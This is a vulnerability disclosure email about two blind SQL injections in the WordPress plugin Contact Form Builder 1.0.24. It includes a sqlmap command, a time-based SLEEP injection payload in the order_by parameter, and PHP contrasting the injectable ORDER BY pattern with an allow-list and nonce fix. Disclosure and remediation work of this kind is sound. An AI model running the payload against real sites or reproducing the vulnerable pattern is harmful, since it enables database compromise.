Subject: Blind SQL injections in Contact Form Builder 1.0.24
Date: Tue, 7 Jul 2015 12:14:52 +0200

Hello,

Plugin: Contact Form Builder 1.0.24 

Authenticated administrators can execute arbitrary SQL commands, and the vulnerable requests carry no CSRF protection.


1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=blocked_ips_cfm
Parameters: order_by, asc_or_desc

Example PHP call stack:

  CFMModelBlocked_ips_cfm::get_rows_data   [/contact-form-builder/admin/models/CFMModelBlocked_ips_cfm.php:33]
  wpdb::get_results

Sqlmap verification: 

sqlmap --cookie "..." --dbms mysql --method POST --data "order_by=ip&asc_or_desc=asc" -u http://localhost/wp-admin/admin.php?page=blocked_ips_cfm -p order_by

...
Parameter: order_by (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc
...

Please note that there must be at least one record in the wp_contactformmaker_blocked table for the sqlmap payloads to succeed: the injected expression sits in the ORDER BY clause and is only evaluated when there are rows to sort, so on an empty table SLEEP() never fires.



2. SQL injection (CFMModelManage_cfm::get_rows_data())

Analogous to SQL injection #1; the two methods are almost identical.

/contact-form-builder/admin/models/CFMModelManage_cfm.php:33
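The pattern behind both findings, shown here as an added illustration that is not code from Contact Form Builder: the sort parameters are concatenated into the ORDER BY clause, where string-escaping helpers cannot help, and the fix is an allow-list plus a nonce check. The column names and the nonce action name are assumed.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical reconstruction of
// the vulnerable shape and a hardened version. Column names and the nonce
// action name are assumptions; the table name is the one from the report.

// Vulnerable shape: request values go straight into ORDER BY. Escaping
// helpers meant for string literals do not apply, because an identifier or
// keyword position has no quotes to escape, so "ip AND (SELECT ...)" is
// simply sorted by.
function get_rows_data_vulnerable() {
    global $wpdb;
    $order_by    = isset( $_POST['order_by'] ) ? $_POST['order_by'] : 'id';
    $asc_or_desc = isset( $_POST['asc_or_desc'] ) ? $_POST['asc_or_desc'] : 'asc';
    $query = 'SELECT * FROM ' . $wpdb->prefix . 'contactformmaker_blocked'
           . ' ORDER BY ' . $order_by . ' ' . $asc_or_desc;   // injectable
    return $wpdb->get_results( $query );
}

// Hardened version: the request can only *choose among* fixed, trusted
// values, and a nonce check closes the CSRF gap noted in the report.
function get_rows_data_hardened() {
    global $wpdb;

    // Dies unless the request carries a valid nonce for this action; the
    // sorting form must emit wp_nonce_field( 'cfm_sort_blocked_ips' ).
    check_admin_referer( 'cfm_sort_blocked_ips' );  // assumed action name

    $allowed_columns = array( 'id', 'ip', 'date' );   // assumed column set
    $order_by = 'id';
    if ( isset( $_POST['order_by'] )
         && in_array( $_POST['order_by'], $allowed_columns, true ) ) {
        $order_by = $_POST['order_by'];
    }

    // Only the two literal keywords can ever reach the query string.
    $direction = 'ASC';
    if ( isset( $_POST['asc_or_desc'] )
         && strtolower( $_POST['asc_or_desc'] ) === 'desc' ) {
        $direction = 'DESC';
    }

    $query = 'SELECT * FROM ' . $wpdb->prefix . 'contactformmaker_blocked'
           . ' ORDER BY `' . $order_by . '` ' . $direction;
    return $wpdb->get_results( $query );
}
```

With the hardened version, the time-based payload from the sqlmap output above is not in the allow-list and falls back to the default column, so it never reaches MySQL.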


--
Regards,
Marcin Probola,
https://pl.wordpress.org/plugins/contact-form-builder/